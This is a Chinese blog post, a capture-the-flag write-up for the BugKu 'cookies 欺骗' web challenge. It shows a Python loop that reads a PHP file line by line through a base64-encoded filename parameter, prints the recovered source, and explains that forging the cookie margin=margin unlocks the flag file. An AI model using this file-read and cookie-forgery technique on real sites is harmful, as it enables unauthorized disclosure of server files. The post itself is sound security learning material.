BugKu:cookies 欺骗

最新推荐文章于 2021-07-01 10:02:02 发布
最新推荐文章于 2021-07-01 10:02:02 发布
阅读量1.5k 收藏 1
点赞数 1
分类专栏: python ctf web 文章标签: python web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wssmiss/article/details/88806901
版权
ctf 同时被 3 个专栏收录
40 篇文章 0 订阅
订阅专栏
python
11 篇文章 2 订阅
订阅专栏
web
11 篇文章 0 订阅
订阅专栏

题目链接
http://123.206.87.240:8002/web11/
在这里插入图片描述
查看源码后没有可用信息
观察url发现参数filename的值加密了
解密后filename=keys.txt
尝试用修改参数filename的值为index.php(注意此处要用base64加密为aW5kZXgucGhw)
发现参数line没有给值,随意赋值如3,出现
在这里插入图片描述
写脚本抓原代码,先试一下有多少行,100,50,25,20都无回显,大约定在20

    import requests
    import re
    
    for i in range(1,21):
        url="http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"
        s=requests.get(url)
        print(s.text)

读取的源码:

error_reporting(0);

$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");

$line=isset($_GET['line'])?intval($_GET['line']):0;

if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");

$file_list = array(

'0' =>'keys.txt',

'1' =>'index.php',

);

 

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){

$file_list[2]='keys.php';

}

 

if(in_array($file, $file_list)){

$fa = file($file);

echo $fa[$line];

}

分析源代码,当cookie的margin=margin时,可以访问一个keys.php文件
注意把参数filename的值改为base64加密后的keys.php
在这里插入图片描述
得到flag

wssmiss
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
BugkuCTF-WEB题cookie欺骗
am_03的博客
08-29 875
知识点 isset: 检测变量是否设置,并且不是 NULL $_GET:收集来自 method=“get” 的表单里的值 intval() 函数用于获取变量的整数值。 in_array() 函数搜索数组里是否存在指定的值。 举例: <?php $am = array("Bill", "Steve", "trump", "David"); if (in_array("trump", $am)) { echo "匹配已找到"; } else { echo "匹配未找到"; } ?&
cookie欺骗bugku)
weixin_46396711的博客
04-28 1227
解题思路: 打开链接,发现是一串无意义的字符串 观察url,发现filename的值为base64编码格式,解码为keys.txt,line应该表示行,基于此,可通过改变line的值并将filename值改为index.php(记得转为base64格式),查看该文件的代码。 当line=1时 当line=2时 可通过python脚本将该文件内容打印出来 import requests a=25 #表示index.php文件的代码行数 for i in range(a): url="http:/
bugkucookies欺骗 writeup
perye
02-27 2972
看到url上的参数有base64,解码发现是keys.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来#!/usr/bin/env python # -*- coding: utf-8 -*- import requests s=requests.Session() url='http://120.24.86.145:8002/web11/in...
Bugku——cookie欺骗
csu_vc的博客
10-28 8364
看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来#!/usr/bin/env python # -*- coding: utf-8 -*- # @Date : 2017-10-28 09:36:41 # @Author : csu_vc # @Link : http://blog.c
cookies欺骗
静花紫意的专栏
05-22 968
<br />第一,几个基本概念<br /><br />cookies欺骗,就是在只对用户做cookies验证的系统中,通过修改cookies的内容来得到相应的用<br /><br />户权限登录。(呵呵,我自己的定义,高手别见笑)<br /><br />那么什么是cookies呢,我这里给大家一个专业的解释,Cookies是一个储存于浏览器目录中的文<br /><br />本文件,记录你访问一个特定站点的信息,且只能被创建这个Cookies的站点读回,约由255个字<br /><br />符组成,仅占4KB
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
cookies:Cookies应用
03-30
"cookies:Cookies应用" 这个标题主要指涉的是关于CookiesWeb开发中的应用。Cookies是小型文本文件,由Web服务器发送到用户的浏览器并存储在那里,用于在用户与网站交互时保持状态。这个主题可能涵盖如何创建、读取...
Cookies 欺骗漏洞的防范方法(vbs+js 实现)
10-29
【标题】: "防范Cookies欺骗漏洞的策略与实践(vbs+js实现)" 【描述】: 本文探讨了如何防范ASP开发中的Cookies欺骗漏洞,通过VBS(Visual Basic Script)和JS(JavaScript)代码示例,阐述了从依赖不安全的Cookies...
js-cookies:JavaScript Cookies API库
05-08
JavaScript Cookies 使用Cookies类在网页中创建Cookies 。 安装 直接安装 有关如何在浏览器中加载脚本的示例: < script type =" text/javascript " src =" /path/to/Cookies.js " > </ script > 要求...
ASP编程入门进阶(六):Cookies讲座
01-01
每个站点的Cookie与其他所有站点的Cookie存在同一文件夹中的不同文件内(你可以在 win98 的 Windows 目录下的 Cookie 文件夹中找到它们,而 win2k 则在 Documents and Settings 文件夹下特定用户的 cookies 文件夹中...
Bugku】秋名山老司机 详细题解 Writeup
algae
11-24 1315
import requests import re url = 'http://123.206.87.240:8002/qiumingshan/' s = requests.Session() req = s.get(url) expression = re.search(r'(\d+[+\-*])+(\d+)', req.text).group() # expression = req.text[req.text.find('<div>')+5:req.text.find('=?')] re
cookies欺骗bugku-web
小白的劝退之路
04-30 278
cookie欺骗
FreeXploiT
10-25 2037
现在有很多社区网为了方便网友浏览,都使用了cookie技术以避免多次输入密码(就如the9 和vr),所以只要对服务器递交给用户的cookie进行改写就可以达到欺骗服务程序的目的。 COOKIE欺骗原理 按照浏览器的约定,只有来自同一域名的cookie才可以读写,而cookie只是浏览器的,对通 讯协议无影响,所以要进行cookie欺骗可以有多种途径: 1、跳过浏览器,直接对通讯数据改写 2、修改
Bugku WEB cookies
qq_41696858的博客
07-01 174
打开场景,直接在url里面带了filename,明显的文件读取漏洞 利用脚本读取index.php的所有内容 ——------------------------------ #! /usr/bin/python import requests a=30 for i in range(a): url="http://120.24.86.145:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw" s=requests
Cookie欺骗
Yp2800的专栏
03-11 1722
Cookie文件名称格式: 你的用户名@产生的COOKIE的网页文件所在的WEB目录[COOKIE改变的次数].txt 如: ibm@baidu[1].txt 设置cookie脚本 Set-Cookie: name = VALUE; expires = DATE; path = PATH; domain = DOMAIN_NAME; if request.cookies(
cookie欺骗初探
pairsfish的专栏(你知道东方在哪一边)
06-29 1558
先普及一下基础知识 cookie欺骗      :就是利用cookie来欺骗,攻击过程中对于cookie的利用在于,cookie注入和cookie欺骗。 其它方法          :其他比较常用的还有xss,sql注入,旁注,什么的,这些先不提,多说一下这个跨站攻击其实叫做css,cross-site啥的,不过css这个简称已经被占用了,所以只能叫做xss了。         cookie
bugku Web8
rommel的博客
08-28 5321
extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "This is flag:" ." $flag"; } else { echo "sorry!"; } } ?> 根据题目的提示我们猜测目录下有txt文件,于是我们试出了http:
【lyctf】 你能破解无线吗 writeup
perye
02-26 3357
文件是.cap,用wireshark查看都是802.11协议的包过滤一下 eapol协议的包上工具Aircrack-ng安装可参考http://blog.csdn.net/zhou191954/article/details/45197805提示,密码是手机号给出了前七位写个字典出来import java.io.File; import java.io.FileOutputStream; impo...
BugKu web20 cookies欺骗
m0_49762339的博客
12-24 542
BugKu web20 cookies欺骗 ①打开页面发现一堆乱码什么意思也不知道。然后看到url有两个参数(line=&filename=a2V5cy50eHQ=) ②其中一个是“a2V5cy50eHQ=”base64解码后是“keys.txt”,然后盲猜line是行数。这时就想看看index.php(base64后为aW5kZXgucGhwCg==) ③然后给file参数1,2,3……发现出现了代码。这时就想到爬虫来帮忙收集代码 废话不多说直接上代码: import requests for i
Web安全性:Cookies与电子商务安全威胁
"这篇PPT主要探讨了Cookie在Web站点管理中的应用以及网络安全问题,特别是关注了Cookie的安全性。内容涵盖了Web安全的多个方面,包括Web的结构、开发环境、CGI和ASP的安全威胁,以及ActiveX和SSL等技术的安全性。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值